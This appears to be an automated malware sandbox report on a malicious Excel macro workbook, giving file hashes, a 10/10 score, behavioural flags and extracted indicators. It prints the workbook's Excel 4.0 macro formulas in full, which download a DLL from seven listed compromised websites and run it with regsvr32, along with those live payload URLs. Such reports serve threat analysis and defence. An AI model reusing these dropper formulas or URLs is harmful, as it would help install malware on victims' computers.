Overview

overview

10

Static

static

10

c8a033407c...e.xlsm

windows7-x64

10

c8a033407c...e.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    c8a033407c2d16d4bb9e4027542f2347fa87cc920a28db1d97df25064ad4b0de

  • Size

    20KB

  • Sample

    241120-v9edhazqav

  • MD5

    16ec838ab610983e758051a5b2379bba

  • SHA1

    f579ad95b4b4703a2a81e8dd38327581aa29b5d4

  • SHA256

    c8a033407c2d16d4bb9e4027542f2347fa87cc920a28db1d97df25064ad4b0de

  • SHA512

    7d215faebc47e1c86b1d3d76e2cc8eac27702c633060814aa797d4c390854250b83ab57018284584dd3f5545168346e277cf06cbb6fb8e8bcd37211ec92d0b5d

  • SSDEEP

    384:CHM0Vb1GNjDo4CGzPd6ZIwA1hKb5CzgObff9kC+xbX7qE7h:30INfo4FLH2CBn9kC+xbLq+

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://canismallorca.es/wp-admin/OTyeYrx9C9BvYvVb3/

http://capslock.co.za/wp-includes/LMngUUTuanBofr5zK/

http://www.cafe-kwebbel.nl/layouts/3Wkev/

http://bkps.ac.th/b91-std63/Ixv52m8gu4aaUiyb/

http://borbajardinagem.com.br/erros/vlB3f6XpsZG/

http://www.best-design.gr/_errorpages/9wCa7GLI0cl6nM/

http://belleile-do.fr/diapo-ile/EeBHyfGoKYACY/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://canismallorca.es/wp-admin/OTyeYrx9C9BvYvVb3/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://capslock.co.za/wp-includes/LMngUUTuanBofr5zK/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cafe-kwebbel.nl/layouts/3Wkev/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bkps.ac.th/b91-std63/Ixv52m8gu4aaUiyb/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://borbajardinagem.com.br/erros/vlB3f6XpsZG/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.best-design.gr/_errorpages/9wCa7GLI0cl6nM/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://belleile-do.fr/diapo-ile/EeBHyfGoKYACY/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://canismallorca.es/wp-admin/OTyeYrx9C9BvYvVb3/
xlm40.dropper

http://capslock.co.za/wp-includes/LMngUUTuanBofr5zK/
xlm40.dropper

http://www.cafe-kwebbel.nl/layouts/3Wkev/
xlm40.dropper

http://bkps.ac.th/b91-std63/Ixv52m8gu4aaUiyb/
xlm40.dropper

http://borbajardinagem.com.br/erros/vlB3f6XpsZG/

Targets

    • Target

      c8a033407c2d16d4bb9e4027542f2347fa87cc920a28db1d97df25064ad4b0de

    • Size

      20KB

    • MD5

      16ec838ab610983e758051a5b2379bba

    • SHA1

      f579ad95b4b4703a2a81e8dd38327581aa29b5d4

    • SHA256

      c8a033407c2d16d4bb9e4027542f2347fa87cc920a28db1d97df25064ad4b0de

    • SHA512

      7d215faebc47e1c86b1d3d76e2cc8eac27702c633060814aa797d4c390854250b83ab57018284584dd3f5545168346e277cf06cbb6fb8e8bcd37211ec92d0b5d

    • SSDEEP

      384:CHM0Vb1GNjDo4CGzPd6ZIwA1hKb5CzgObff9kC+xbX7qE7h:30INfo4FLH2CBn9kC+xbLq+

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks